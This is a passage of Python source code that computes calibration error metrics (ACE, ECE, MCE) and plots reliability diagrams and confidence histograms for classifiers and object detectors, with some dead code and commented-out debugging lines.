Identifier to specify the used metric. Must be one of 'ace', 'ece' or 'mce'.
acc_hist : np.ndarray of shape (n_bins, [n_bins, [n_bins, [...]]])
Histogram with average accuracy in each bin.
conf_hist : np.ndarray of shape (n_bins, [n_bins, [n_bins, [...]]])
Histogram with average confidence in each bin.
variance_hist : np.ndarray of shape (n_bins, [n_bins, [n_bins, [...]]])
Histogram with average variance in each bin. This array is currently not used but
might be utilized in the future.
num_samples_hist : np.ndarray of shape (n_bins, [n_bins, [n_bins, [...]]])
Histogram with number of samples in each bin.
Returns
-------
tuple of length 6 (miscalibration score, miscalibration map, accuracy map, confidence map, variance map, num samples map)
All maps without confidence dimension.
"""
# in order to determine miscalibration w.r.t. additional features (excluding confidence dimension),
# reduce the first (confidence) dimension and determine the amount of samples in the remaining bins
samples_map = np.sum(num_samples_hist, axis=0)
total_samples = np.sum(samples_map)
# first, get deviation map
deviation_map = np.abs(acc_hist - conf_hist)
reduce_result = self.reduce(acc_hist, num_samples_hist, axis=0)
acc_hist = reduce_result[0]
conf_hist, _ = self.reduce(conf_hist, num_samples_hist, axis=0, reduce_result=reduce_result)
variance_hist, _ = self.reduce(variance_hist, num_samples_hist, axis=0, reduce_result=reduce_result)
# second, determine metric scheme
if metric == 'ace':
# ace is the average miscalibration weighted by the amount of non-empty bins
# for the bin map, reduce confidence dimension
reduced_deviation_map = np.sum(deviation_map, axis=0)
non_empty_bins = np.count_nonzero(num_samples_hist, axis=0)
# divide by leaving out empty bins (those are initialized to 0)
bin_map = np.divide(reduced_deviation_map, non_empty_bins,
out=np.zeros_like(reduced_deviation_map), where=non_empty_bins != 0)
miscalibration = np.sum(bin_map / np.count_nonzero(np.sum(num_samples_hist, axis=0)))
elif metric == 'ece':
# relative number of samples in each bin (including confidence dimension)
rel_samples_hist = num_samples_hist / total_samples
miscalibration = np.sum(deviation_map * rel_samples_hist)
# sum weighted deviation along confidence dimension
bin_map, _ = self.reduce(deviation_map, num_samples_hist, axis=0, reduce_result=reduce_result)
elif metric == 'mce':
# get maximum deviation
miscalibration = np.max(deviation_map)
bin_map = np.max(deviation_map, axis=0)
else:
raise ValueError("Unknown miscalibration metric. This exception is fatal at this point. Fix your implementation.")
return miscalibration, bin_map, acc_hist, conf_hist, variance_hist, samples_map
def _prepare_bins(self, X: List[np.ndarray], num_features: int) -> List[List[np.ndarray]]:
""" Prepare number of bins for binning scheme. """
# check bins parameter
# is int? distribute to all dimensions
if isinstance(self.bins, int):
bins = [self.bins, ] * num_features
# is iterable? check for compatibility with all properties found
elif isinstance(self.bins, (tuple, list)):
if len(self.bins) != num_features:
raise AttributeError("Length of \'bins\' parameter must match number of features.")
else:
bins = self.bins
else:
raise AttributeError("Unknown type of parameter \'bins\'.")
# create an own set of bin boundaries for each batch in X
bin_bounds = [[np.linspace(0.0, 1.0, bins + 1) for bins in bins] for _ in X]
# on equal_intervals=True, simply use linspace
# if the goal is to equalize the amount of samples in each bin, use np.quantile
if not self.equal_intervals:
for i, (batch_X, bounds) in enumerate(zip(X, bin_bounds)):
for dim, b in enumerate(bounds):
quantile = np.quantile(batch_X[:, dim], q=b, axis=0)
# set lower and upper bounds to confidence limits
quantile[0] = 0.
quantile[-1] = 1.
bin_bounds[i][dim] = quantile
return bin_bounds
def _prepare_input(self, X: np.ndarray, y: np.ndarray) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
""" Prepare structure of input data (number of dimensions, etc.) """
# remove unnecessary dims if given
y = self.squeeze_generic(y, axes_to_keep=0)
# after processing uncertainty, we expect batch_X to be only 2-D afterwards (but probably with more samples)
# if we had no uncertainty, we expect that anyway
assert X.ndim <= 2, "Fatal error: invalid number of dimensions."
assert y.size > 0, "No samples provided."
assert X.shape[0] == y.shape[0], "Unequal number of samples given in X and y."
# on detection mode, we only have binary samples
if (y.ndim > 1 or (np.unique(y) > 1).any()) and self.detection:
raise ValueError("On detection, only binary values for y are valid.")
# on detection mode, leave y array untouched
elif len(y.shape) == 2 and not self.detection:
# still assume y as binary with ground truth labels present in y=1 entry
if y.shape[1] <= 2:
y = y[:, -1]
# assume y as one-hot encoded
else:
y = np.argmax(y, axis=1)
# clip to (0, 1) in order to get all samples into binning scheme
X = np.clip(X, self.epsilon, 1. - self.epsilon)
# -------------------------------------------------
# now evaluate the accuracy/precision
# on detection mode or binary classification, the accuracy/precision is already given in y
if self.detection or len(np.unique(y)) <= 2:
matched = np.array(y)
# on multiclass classification, we need to evaluate the accuracy by the predictions in X
else:
matched = np.argmax(X, axis=1) == y
X = np.max(X, axis=1, keepdims=True)
return X, y, matched
def _prepare_uncertainty(self, X: np.ndarray, y: np.ndarray, uncertainty: str) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
""" Prepare input data for uncertainty handling. """
# -------------------------------------------------
# process uncertainty mode first
if uncertainty is None:
if X.ndim == 3:
print("Input data is 3D but uncertainty type not specified. Using \'mean\'.")
# set uncertainty type and according list within this loop since this will be executed
# only once (if ever)
uncertainty = 'mean'
else:
return X, y, np.zeros_like(X)
# on uncertainty mode, there might be two reasons why there are only 2 dimensions:
# first case: no additional uncertainty support, only observation and feature/multiclass dimension given
# second case: no additional features/multiclass probs, only realization and obervation dimensions are given
if X.ndim == 2:
# identify axis that holds the observation dimension
obs_dim = [shape == y.shape[-1] for shape in X.shape].index(True)
# first case: no probability/realization axis - prepend dimension
# this is equivalent to no uncertainty
if obs_dim == 0:
X = np.expand_dims(X, axis=0)
# second case: no feature/multiclass prob axis - append axis
elif obs_dim == 1:
X = np.expand_dims(X, axis=2)
else:
raise ValueError("Input data is incosistent for uncertainty mode.")
# process the different types of uncertainty
# first one: MC integration with additional uncertainty per sample
if uncertainty in ['mean', 'median', 'mode']:
# first condition: check for invalid detection mode
# second condition: check for invalid binary classification mode
# third condition: check for invalid multiclass classification mode
if (y.ndim == 2 and self.detection) or \
(y.ndim == 2 and X.ndim == 2 and not self.detection) or \
(y.ndim == 3 and X.ndim == 3 and not self.detection):
raise ValueError("Separate ground-truth information is provided for each probability forward pass "
"but uncertainty type \'mean\', \'median\' or \'mode\' is specified.")
if uncertainty == 'mean':
X, X_uncertainty = self._mean(X)
elif uncertainty == 'median':
X, X_uncertainty = self._median(X)
elif uncertainty == 'mode':
X, X_uncertainty = self._mode(X)
else:
raise AttributeError("Fatal implementation error.")
# second one: treat each parameter set separately
# however, we can not assess the uncertainty of a single sample in this case
elif uncertainty == 'flatten':
X, y = self._flatten(X, y)
X_uncertainty = np.zeros_like(X)
else:
raise NotImplementedError("Uncertainty type \'%s\' is not implemented." % uncertainty)
return X, y, X_uncertainty
def _flatten(self, X: np.ndarray, y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
""" repeat features to flattened confidence estimates """
# multiclass classification
if X.ndim == 3 and not self.detection:
n_classes = X.shape[1]
# if y is 3-D on multiclass classification, we also have separate ground-truth information available
# then simply flatten
if y.ndim == 3:
y = np.reshape(y, (-1, y.shape[2]))
else:
y = np.tile(y, X.shape[0])
# use NumPy's reshape function to flatten array along first axis
X = np.reshape(X, (-1, n_classes))
# binary classification
else:
n_features = X.shape[2]
# if y is 2-D on binary classification or detection, we also
# have separate ground-truth information available
# then simply flatten
if y.ndim == 2:
y = y.flatten()
else:
y = np.tile(y, X.shape[0])
# use NumPy's reshape function to flatten array along first axis
X = np.reshape(X, (-1, n_features))
return X, y
def _mean(self, X: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
""" return mean of input data along first axis """
return np.mean(X, axis=0), np.var(X, axis=0)
def _median(self, X: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
""" return median of input data along first axis """
return np.median(X, axis=0), np.var(X, axis=0)
def _mode(self, X: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
""" return mode of input data along first axis """
ret = []
# credible interval bounds on confidence only
for feature in range(X.shape[-1]):
bounds = hpdi(X[..., feature], 0.05)
mode = np.sum(bounds, axis=1) / 2.
ret.append(mode)
return np.stack(ret, axis=1), np.var(X, axis=0)
def _measure(self, X: Union[Iterable[np.ndarray], np.ndarray], y: Union[Iterable[np.ndarray], np.ndarray],
metric: str, batched: bool = False, uncertainty: str = None,
return_map: bool = False,
return_num_samples: bool = False,
return_uncertainty_map: bool = False) -> Union[float, Tuple]:
"""
Measure calibration by given predictions with confidence and the according ground truth.
Assume binary predictions with y=1.
Parameters
----------
X : iterable of np.ndarray, or np.ndarray of shape=([n_bayes], n_samples, [n_classes/n_box_features])
NumPy array with confidence values for each prediction on classification with shapes
1-D for binary classification, 2-D for multi class (softmax).
If 3-D, interpret first dimension as samples from an Bayesian estimator with mulitple data points
for a single sample (e.g. variational inference or MC dropout samples).
If this is an iterable over multiple instances of np.ndarray and parameter batched=True,
interpret this parameter as multiple predictions that should be averaged.
On detection, this array must have 2 dimensions with number of additional box features in last dim.
y : iterable of np.ndarray with same length as X or np.ndarray of shape=([n_bayes], n_samples, [n_classes])
NumPy array with ground truth labels.
Either as label vector (1-D) or as one-hot encoded ground truth array (2-D).
If 3-D, interpret first dimension as samples from an Bayesian estimator with mulitple data points
for a single sample (e.g. variational inference or MC dropout samples).
If iterable over multiple instances of np.ndarray and parameter batched=True,
interpret this parameter as multiple predictions that should be averaged.
batched : bool, optional, default: False
Multiple predictions can be evaluated at once (e.g. cross-validation examinations) using batched-mode.
All predictions given by X and y are separately evaluated and their results are averaged afterwards
for visualization.
uncertainty : str, optional, default: False
Define uncertainty handling if input X has been sampled e.g. by Monte-Carlo dropout or similar methods
that output an ensemble of predictions per sample. Choose one of the following options:
- flatten: treat everything as a separate prediction - this option will yield into a slightly better
calibration performance but without the visualization of a prediction interval.
- mean: compute Monte-Carlo integration to obtain a simple confidence estimate for a sample
(mean) with a standard deviation that is visualized.
metric : str
Determine metric to measure. Must be one of 'ACE', 'ECE' or 'MCE'.
return_map: bool, optional, default: False
If True, return map with miscalibration metric separated into all remaining dimension bins.
return_num_samples : bool, optional, default: False
If True, also return the number of samples in each bin.
return_uncertainty_map : bool, optional, default: False
If True, also return the average deviation of the confidence within each bin.
Returns
-------
float or tuple of (float, np.ndarray, [np.ndarray, [np.ndarray]])
Always returns miscalibration metric.
If 'return_map' is True, return tuple and append miscalibration map over all bins.
If 'return_num_samples' is True, return tuple and append the number of samples in each bin (excluding confidence dimension).
If 'return_uncertainty' is True, return tuple and append the average standard deviation of confidence within each bin (excluding confidence dimension).
"""
# check if metric is correct set
if not isinstance(metric, str):
raise AttributeError('Parameter \'metric\' must be string \'ACE\', \'ECE\' or \'MCE\'.')
if not metric.lower() in ['ace', 'ece', 'mce']:
raise AttributeError('Parameter \'metric\' must be string \'ACE\', \'ECE\' or \'MCE\'.')
else:
metric = metric.lower()
# prepare input data
X, matched, sample_uncertainty, bin_bounds, _ = self.prepare(X, y, batched, uncertainty)
# iterate over all batches of X and matched and calculate average miscalibration
results = []
for batch_X, batch_matched, batch_uncertainty, bounds in zip(X, matched, sample_uncertainty, bin_bounds):
# perform binning on input arrays and drop last outcome (idx bin indices are not needed here)
histograms = self.binning(bounds, batch_X, batch_matched, batch_X[:, 0], batch_uncertainty[:, 0])
histograms = histograms[:-1]
result = self.process(metric, *histograms)
results.append(result)
# finally, average over all batches
miscalibration = np.mean([result[0] for result in results], axis=0)
bin_map = np.mean([result[1] for result in results], axis=0)
samples_map = np.mean([result[-1] for result in results], axis=0)
uncertainty_map = np.sqrt(np.mean([result[-2] for result in results], axis=0))
# build output structure w.r.t. user input
if return_map or return_num_samples or return_uncertainty_map:
return_value = (float(miscalibration),)
if return_map:
return_value = return_value + (bin_map,)
if return_num_samples:
return_value = return_value + (samples_map,)
if return_uncertainty_map:
return_value = return_value + (uncertainty_map,)
return return_value
else:
return float(miscalibration)
class ReliabilityDiagram(object):
"""
Plot Confidence Histogram and Reliability Diagram to visualize miscalibration.
On classification, plot the gaps between average confidence and observed accuracy bin-wise over the confidence
space [1]_, [2]_.
On detection, plot the miscalibration w.r.t. the additional regression information provided (1-D or 2-D) [3]_.
Parameters
----------
bins : int or iterable, default: 10
Number of bins used by the ACE/ECE/MCE.
On detection mode: if int, use same amount of bins for each dimension (nx1 = nx2 = ... = bins).
If iterable, use different amount of bins for each dimension (nx1, nx2, ... = bins).
equal_intervals : bool, optional, default: True
If True, the bins have the same width. If False, the bins are splitted to equalize
the number of samples in each bin.
detection : bool, default: False
If False, the input array 'X' is treated as multi-class confidence input (softmax)
with shape (n_samples, [n_classes]).
If True, the input array 'X' is treated as a box predictions with several box features (at least
box confidence must be present) with shape (n_samples, [n_box_features]).
fmin : float, optional, default: None
Minimum value for scale color.
fmax : float, optional, default: None
Maximum value for scale color.
metric : str, default: 'ECE'
Metric to measure miscalibration. Might be either 'ECE', 'ACE' or 'MCE'.
References
----------
.. [1] Chuan Guo, Geoff Pleiss, Yu Sun and Kilian Q. Weinberger:
"On Calibration of Modern Neural Networks."
Proceedings of the 34th International Conference on Machine Learning-Volume 70. JMLR. org, 2017.
`Get source online <https://arxiv.org/abs/1706.04599>`_
.. [2] A. Niculescu-Mizil and R. Caruana:
“Predicting good probabilities with supervised learning.”
Proceedings of the 22nd International Conference on Machine Learning, 2005, pp. 625–632.
`Get source online <https://www.cs.cornell.edu/~alexn/papers/calibration.icml05.crc.rev3.pdf>`_
.. [3] Fabian Küppers, Jan Kronenberger, Amirhossein Shantia and Anselm Haselhoff:
"Multivariate Confidence Calibration for Object Detection."
The IEEE Conference on Computer Vision and Pattern Recognition (CVPR) Workshops, 2020.
`Get source online <https://openaccess.thecvf.com/content_CVPRW_2020/papers/w20/Kuppers_Multivariate_Confidence_Calibration_for_Object_Detection_CVPRW_2020_paper.pdf>`_
"""
def __init__(self, bins: Union[int, Iterable[int]] = 10, equal_intervals: bool = True,
detection: bool = False, sample_threshold: int = 1,
fmin: float = None, fmax: float = None,
metric: str = 'ECE', style: str = "curve", **kwargs):
""" Constructor. For detailed parameter documentation view classdocs. """
assert style in ["curve", "bar"]
self.bins = bins
self.detection = detection
self.sample_threshold = sample_threshold
self.fmin = fmin
self.fmax = fmax
self.metric = metric
self.style = style
if 'feature_names' in kwargs:
self.feature_names = kwargs['feature_names']
if 'title_suffix' in kwargs:
self.title_suffix = kwargs['title_suffix']
self._miscalibration = _Miscalibration(bins=bins, equal_intervals=equal_intervals,
detection=detection, sample_threshold=sample_threshold)
def plot(self, X: Union[Iterable[np.ndarray], np.ndarray], y: Union[Iterable[np.ndarray], np.ndarray],
batched: bool = False, uncertainty: str = None, filename: str = None, tikz: bool = False,
title_suffix: str = None, feature_names: List[str] = None, **save_args) -> Union[plt.Figure, str]:
"""
Reliability diagram to visualize miscalibration. This could be either in classical way for confidences only
or w.r.t. additional properties (like x/y-coordinates of detection boxes, width, height, etc.). The additional
properties get binned. Afterwards, the miscalibration will be calculated for each bin. This is
visualized as a 2-D plots.
Parameters
----------
X : iterable of np.ndarray, or np.ndarray of shape=([n_bayes], n_samples, [n_classes/n_box_features])
NumPy array with confidence values for each prediction on classification with shapes
1-D for binary classification, 2-D for multi class (softmax).
If 3-D, interpret first dimension as samples from an Bayesian estimator with mulitple data points
for a single sample (e.g. variational inference or MC dropout samples).
If this is an iterable over multiple instances of np.ndarray and parameter batched=True,
interpret this parameter as multiple predictions that should be averaged.
On detection, this array must have 2 dimensions with number of additional box features in last dim.
y : iterable of np.ndarray with same length as X or np.ndarray of shape=([n_bayes], n_samples, [n_classes])
NumPy array with ground truth labels.
Either as label vector (1-D) or as one-hot encoded ground truth array (2-D).
If 3-D, interpret first dimension as samples from an Bayesian estimator with mulitple data points
for a single sample (e.g. variational inference or MC dropout samples).
If iterable over multiple instances of np.ndarray and parameter batched=True,
interpret this parameter as multiple predictions that should be averaged.
batched : bool, optional, default: False
Multiple predictions can be evaluated at once (e.g. cross-validation examinations) using batched-mode.
All predictions given by X and y are separately evaluated and their results are averaged afterwards
for visualization.
uncertainty : str, optional, default: False
Define uncertainty handling if input X has been sampled e.g. by Monte-Carlo dropout or similar methods
that output an ensemble of predictions per sample. Choose one of the following options:
- flatten: treat everything as a separate prediction - this option will yield into a slightly better
calibration performance but without the visualization of a prediction interval.
- mean: compute Monte-Carlo integration to obtain a simple confidence estimate for a sample
(mean) with a standard deviation that is visualized.
filename : str, optional, default: None
Optional filename to save the plotted figure.
tikz : bool, optional, default: False
If True, use 'tikzplotlib' package to return tikz-code for Latex rather than a Matplotlib figure.
title_suffix : str, optional, default: None
Suffix for plot title.
feature_names : list, optional, default: None
Names of the additional features that are attached to the axes of a reliability diagram.
**save_args : args
Additional arguments passed to 'matplotlib.pyplot.Figure.savefig' function if 'tikz' is False.
If 'tikz' is True, the argument are passed to 'tikzplotlib.get_tikz_code' function.
Returns
-------
matplotlib.pyplot.Figure if 'tikz' is False else str with tikz code.
Raises
------
AttributeError
- If parameter metric is not string or string is not 'ACE', 'ECE' or 'MCE'
- If parameter 'feature_names' is set but length does not fit to second dim of X
- If no ground truth samples are provided
- If length of bins parameter does not match the number of features given by X
- If more than 3 feature dimensions (including confidence) are provided
"""
# assign deprecated constructor parameter to title_suffix and feature_names
if hasattr(self, 'title_suffix') and title_suffix is None:
title_suffix = self.title_suffix
if hasattr(self, 'feature_names') and feature_names is None:
feature_names = self.feature_names
# check if metric is correct
if not isinstance(self.metric, str):
raise AttributeError('Parameter \'metric\' must be string with either \'ece\', \'ace\' or \'mce\'.')
# check metrics parameter
if self.metric.lower() not in ['ece', 'ace', 'mce']:
raise AttributeError('Parameter \'metric\' must be string with either \'ece\', \'ace\' or \'mce\'.')
else:
self.metric = self.metric.lower()
# perform checks and prepare input data
X, matched, sample_uncertainty, bin_bounds, num_features = self._miscalibration.prepare(X, y, batched, uncertainty)
if num_features > 3:
raise AttributeError("Diagram is not defined for more than 2 additional feature dimensions.")
histograms = []
for batch_X, batch_matched, batch_uncertainty, bounds in zip(X, matched, sample_uncertainty, bin_bounds):
batch_histograms = self._miscalibration.binning(bounds, batch_X, batch_matched, batch_X[:, 0], batch_uncertainty[:, 0])
histograms.append(batch_histograms[:-1])
# no additional dimensions? compute standard reliability diagram
if num_features == 1:
fig1, fig2 = self.__plot_confidence_histogram(X, matched, histograms, bin_bounds, title_suffix)
return fig1, fig2
# one additional feature? compute 1D-plot
elif num_features == 2:
fig = self.__plot_1d(histograms, bin_bounds, title_suffix, feature_names)
# two additional features? compute 2D plot
elif num_features == 3:
fig = self.__plot_2d(histograms, bin_bounds, title_suffix, feature_names)
# number of dimensions exceeds 3? quit
else:
raise AttributeError("Diagram is not defined for more than 2 additional feature dimensions.")
# if tikz is true, create tikz code from matplotlib figure
if tikz:
# get tikz code for our specific figure and also pass filename to store possible bitmaps
tikz_fig = tikzplotlib.get_tikz_code(fig, filepath=filename, **save_args)
# close matplotlib figure when tikz figure is requested to save memory
plt.close(fig)
fig = tikz_fig
# save figure either as matplotlib PNG or as tikz output file
if filename is not None:
if tikz:
with open(filename, "w") as open_file:
open_file.write(fig)
else:
fig.savefig(filename, **save_args)
return fig
@classmethod
def __interpolate_grid(cls, metric_map: np.ndarray) -> np.ndarray:
""" Interpolate missing values in a 2D-grid using the mean of the data. The interpolation is done inplace. """
# get all NaNs
nans = np.isnan(metric_map)
x = lambda z: z.nonzero()
# get mean of the remaining values and interpolate missing by the mean
mean = float(np.mean(metric_map[~nans]))
metric_map[nans] = griddata(x(~nans), metric_map[~nans], x(nans), method='cubic', fill_value=mean)
return metric_map
def __plot_confidence_histogram(self, X: List[np.ndarray], matched: List[np.ndarray], histograms: List[np.ndarray],
bin_bounds: List, title_suffix: str = None) -> plt.Figure:
""" Plot confidence histogram and reliability diagram to visualize miscalibration for condidences only. """
# get number of bins (self.bins has not been processed yet)
n_bins = len(bin_bounds[0][0])-1
median_confidence = [(bounds[0][1:] + bounds[0][:-1]) * 0.5 for bounds in bin_bounds]
mean_acc, mean_conf = [], []
for batch_X, batch_matched, batch_hist, batch_median in zip(X, matched, histograms, median_confidence):
acc_hist, conf_hist, _, num_samples_hist = batch_hist
empty_bins, = np.nonzero(num_samples_hist == 0)
# calculate overall mean accuracy and confidence
mean_acc.append(np.mean(batch_matched))
mean_conf.append(np.mean(batch_X))
# set empty bins to median bin value
acc_hist[empty_bins] = batch_median[empty_bins]
conf_hist[empty_bins] = batch_median[empty_bins]
# convert num_samples to relative afterwards (inplace denoted by [:])
num_samples_hist[:] = num_samples_hist / np.sum(num_samples_hist)
# import ipdb; ipdb.set_trace()
# get mean histograms and values over all batches
acc = np.mean([hist[0] for hist in histograms], axis=0)
conf = np.mean([hist[1] for hist in histograms], axis=0)
uncertainty = np.sqrt(np.mean([hist[2] for hist in histograms], axis=0))
num_samples = np.mean([hist[3] for hist in histograms], axis=0)
mean_acc = np.mean(mean_acc)
mean_conf = np.mean(mean_conf)
median_confidence = np.mean(median_confidence, axis=0)
bar_width = np.mean([np.diff(bounds[0]) for bounds in bin_bounds], axis=0)
# compute credible interval of uncertainty
p = 0.05
z_score = norm.ppf(1. - (p / 2))
uncertainty = z_score * uncertainty
# if no uncertainty is given, set variable uncertainty to None in order to prevent drawing error bars
if np.count_nonzero(uncertainty) == 0:
uncertainty = None
# calculate deviation
deviation = conf - acc
fig1 = plt.figure("Reliability {}".format(title_suffix))
ax = fig1.add_subplot()
# set title suffix if given
# if title_suffix is not None:
# ax.set_title('Reliability Diagram' + " - " + title_suffix)
# else:
# ax.set_title('Reliability Diagram')
# create two overlaying bar charts with bin accuracy and the gap of each bin to the perfect calibration
if self.style == "bar":
# ax.bar(median_confidence, height=median_confidence, width=bar_width, align='center',
# edgecolor='black', color='pink', alpha=0.6)
ax.bar(median_confidence, height=acc, width=bar_width, align='center',
edgecolor='black', yerr=uncertainty, capsize=2)
# ax.bar(median_confidence, height=deviation, bottom=acc, width=bar_width, align='center',
# edgecolor='black', color='red', alpha=0.6)
else:
ax.plot(median_confidence, acc, color="blue", linestyle="-")
# draw diagonal as perfect calibration line
ax.plot([0, 1], [0, 1], color='red', linestyle='-.')
# ax.set_xlim((0.0, 1.0))
# ax.set_ylim((0.0, 1.0))
# labels and legend of second plot
# ax.set_xlabel('Confidence')
# ax.set_ylabel('Accuracy')
ax.legend(['Output', 'Expected'], fontsize=14)
fig2 = plt.figure("Conf. Hist.")
ax = fig2.add_subplot()
ax.bar(median_confidence, height=num_samples, width=bar_width, align='center', edgecolor='black')
ax.plot([mean_acc, mean_acc], [0.0, 1.0], color='red', linestyle='--')
ax.plot([mean_conf, mean_conf], [0.0, 1.0], color='blue', linestyle='--')
ax.set_xlim((0.0, 1.0))
ax.set_ylim((0.0, 1.0))
plt.tight_layout()
return fig1, fig2
# -----------------------------------------
# plot data distribution histogram first
fig, axes = plt.subplots(2, squeeze=True, figsize=(7, 6))
ax = axes[0]
# set title suffix is given
if title_suffix is not None:
ax.set_title('Confidence Histogram - ' + title_suffix)
else:
ax.set_title('Confidence Histogram')
# create bar chart with relative amount of samples in each bin
# as well as average confidence and accuracy
ax.bar(median_confidence, height=num_samples, width=bar_width, align='center', edgecolor='black')
ax.plot([mean_acc, mean_acc], [0.0, 1.0], color='black', linestyle='--')
ax.plot([mean_conf, mean_conf], [0.0, 1.0], color='gray', linestyle='--')
ax.set_xlim((0.0, 1.0))
ax.set_ylim((0.0, 1.0))
# labels and legend
ax.set_xlabel('Confidence')
ax.set_ylabel('% of Samples')
ax.legend(['Avg. Accuracy', 'Avg. Confidence', 'Relative Amount of Samples'])
# second plot: reliability histogram
ax = axes[1]
# set title suffix if given
if title_suffix is not None:
ax.set_title('Reliability Diagram' + " - " + title_suffix)
else:
ax.set_title('Reliability Diagram')
# create two overlaying bar charts with bin accuracy and the gap of each bin to the perfect calibration
ax.bar(median_confidence, height=acc, width=bar_width, align='center',
edgecolor='black', yerr=uncertainty, capsize=4)
ax.bar(median_confidence, height=deviation, bottom=acc, width=bar_width, align='center',
edgecolor='black', color='red', alpha=0.6)
# draw diagonal as perfect calibration line
ax.plot([0, 1], [0, 1], color='red', linestyle='--')
ax.set_xlim((0.0, 1.0))
ax.set_ylim((0.0, 1.0))
# labels and legend of second plot
ax.set_xlabel('Confidence')
ax.set_ylabel('Accuracy')
ax.legend(['Perfect Calibration', 'Output', 'Gap'])
plt.tight_layout()
return fig
def __plot_1d(self, histograms: List[np.ndarray], bin_bounds: List,
title_suffix: str = None, feature_names: List[str] = None) -> plt.Figure:
""" Plot 1-D miscalibration w.r.t. one additional feature. """
# z score for credible interval (if uncertainty is given)
p = 0.05
z_score = norm.ppf(1. - (p / 2))
results = []
for batch_hist, bounds in zip(histograms, bin_bounds):
result = self._miscalibration.process(self.metric, *batch_hist)
bin_median = (bounds[-1][:-1] + bounds[-1][1:]) * 0.5
# interpolate missing values
x = np.linspace(0.0, 1.0, 1000)
miscalibration = interp1d(bin_median, result[1], kind='cubic', fill_value='extrapolate')(x)
acc = interp1d(bin_median, result[2], kind='cubic', fill_value='extrapolate')(x)
conf = interp1d(bin_median, result[3], kind='cubic', fill_value='extrapolate')(x)
uncertainty = interp1d(bin_median, result[4], kind='cubic', fill_value='extrapolate')(x)
results.append((miscalibration, acc, conf, uncertainty))
# get mean over all batches and convert mean variance to a std deviation afterwards
miscalibration = np.mean([result[0] for result in results], axis=0)
acc = np.mean([result[1] for result in results], axis=0)
conf = np.mean([result[2] for result in results], axis=0)
uncertainty = np.sqrt(np.mean([result[3] for result in results], axis=0))
# draw routines
fig, ax1 = plt.subplots()
conf_color = 'tab:blue'
# set name of the additional feature
if feature_names is not None:
ax1.set_xlabel(feature_names[0])
ax1.set_xlim([0.0, 1.0])
ax1.set_ylim([0.0, 1.0])
ax1.set_ylabel('accuracy/confidence', color=conf_color)
# draw confidence and accuracy on the same (left) axis
x = np.linspace(0.0, 1.0, 1000)
line1, = ax1.plot(x, acc, '-.', color='black')
line2, = ax1.plot(x, conf, '--', color=conf_color)
ax1.tick_params('y', labelcolor=conf_color)
# if uncertainty is given, compute average of variances over all bins and get std deviation by sqrt
# compute credible interval afterwards
# define lower and upper bound
uncertainty = z_score * uncertainty
lb = conf - uncertainty
ub = conf + uncertainty
# create second axis for miscalibration
ax11 = ax1.twinx()
miscal_color = 'tab:red'
line3, = ax11.plot(x, miscalibration, '-', color=miscal_color)
if self.metric == 'ace':
ax11.set_ylabel('Average Calibration Error (ACE)', color=miscal_color)
elif self.metric == 'ece':
ax11.set_ylabel('Expected Calibration Error (ECE)', color=miscal_color)
elif self.metric == 'mce':
ax11.set_ylabel('Maximum Calibration Error (MCE)', color=miscal_color)
ax11.tick_params('y', labelcolor=miscal_color)
# set miscalibration limits if given
if self.fmin is not None and self.fmax is not None:
ax11.set_ylim([self.fmin, self.fmax])
ax1.legend((line1, line2, line3),
('accuracy', 'confidence', '%s' % self.metric.upper()),
loc='best')
if title_suffix is not None:
ax1.set_title('Accuracy, confidence and %s\n- %s -' % (self.metric.upper(), title_suffix))
else:
ax1.set_title('Accuracy, confidence and %s' % self.metric.upper())
ax1.grid(True)
fig.tight_layout()
return fig
def __plot_2d(self, histograms: List[np.ndarray], bin_bounds: List[np.ndarray],
title_suffix: str = None, feature_names: List[str] = None) -> plt.Figure:
""" Plot 2D miscalibration reliability diagram heatmap. """
results = []
for batch_hist in histograms:
result = self._miscalibration.process(self.metric, *batch_hist)
# interpolate 2D data inplace to avoid "empty" bins
batch_samples = result[-1]
for map in result[1:-1]:
map[batch_samples == 0.0] = 0.0
# TODO: check what to do here
# map[batch_samples == 0.0] = np.nan
# self.__interpolate_grid(map)
# on interpolation, it is sometimes possible that empty bins have negative values
# however, this is invalid for variance
result[4][result[4] < 0] = 0.0
results.append(result)
# calculate mean over all batches and transpose
# transpose is necessary. Miscalibration is calculated in the order given by the features
# however, imshow expects arrays in format [rows, columns] or [height, width]
# e.g., miscalibration with additional x/y (in this order) will be drawn [y, x] otherwise
miscalibration = np.mean([result[1] for result in results], axis=0).T
acc = np.mean([result[2] for result in results], axis=0).T
conf = np.mean([result[3] for result in results], axis=0).T
mean = np.mean([result[4] for result in results], axis=0).T
uncertainty = np.sqrt(mean)
# -----------------------------------------------------------------------------------------
# draw routines
def set_axis(ax, map, vmin=None, vmax=None):
""" Generic function to set all subplots equally """
# TODO: set proper fmin, fmax values
img = ax.imshow(map, origin='lower', interpolation="gaussian", cmap='jet', aspect=1, vmin=vmin, vmax=vmax)
# set correct x- and y-ticks
ax.set_xticks(np.linspace(0., len(bin_bounds[0][1])-2, 5))
ax.set_xticklabels(np.linspace(0., 1., 5))
ax.set_yticks(np.linspace(0., len(bin_bounds[0][2])-2, 5))
ax.set_yticklabels(np.linspace(0., 1., 5))
ax.set_xlim([0.0, len(bin_bounds[0][1])-2])
ax.set_ylim([0.0, len(bin_bounds[0][2])-2])
# draw feature names on axes if given
if feature_names is not None:
ax.set_xlabel(feature_names[0])
ax.set_ylabel(feature_names[1])
fig.colorbar(img, ax=ax, fraction=0.046, pad=0.04)
return ax, img
# -----------------------------------
# create only two subplots if no additional uncertainty is given
if np.count_nonzero(uncertainty) == 0:
fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(15, 5))
# process additional uncertainty if given
else:
fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, squeeze=True, figsize=(10, 10))
ax4, img4 = set_axis(ax4, uncertainty)
if title_suffix is not None:
ax4.set_title("Confidence std deviation\n- %s -" % title_suffix)
else:
ax4.set_title("Confidence std deviation")
ax1, img1 = set_axis(ax1, acc, vmin=0, vmax=1)
ax2, img2 = set_axis(ax2, conf, vmin=0, vmax=1)
ax3, img3 = set_axis(ax3, miscalibration, vmin=self.fmin, vmax=self.fmax)
# draw title if given
if title_suffix is not None:
ax1.set_title("Average accuracy\n- %s -" % title_suffix)
ax2.set_title("Average confidence\n- %s -" % title_suffix)
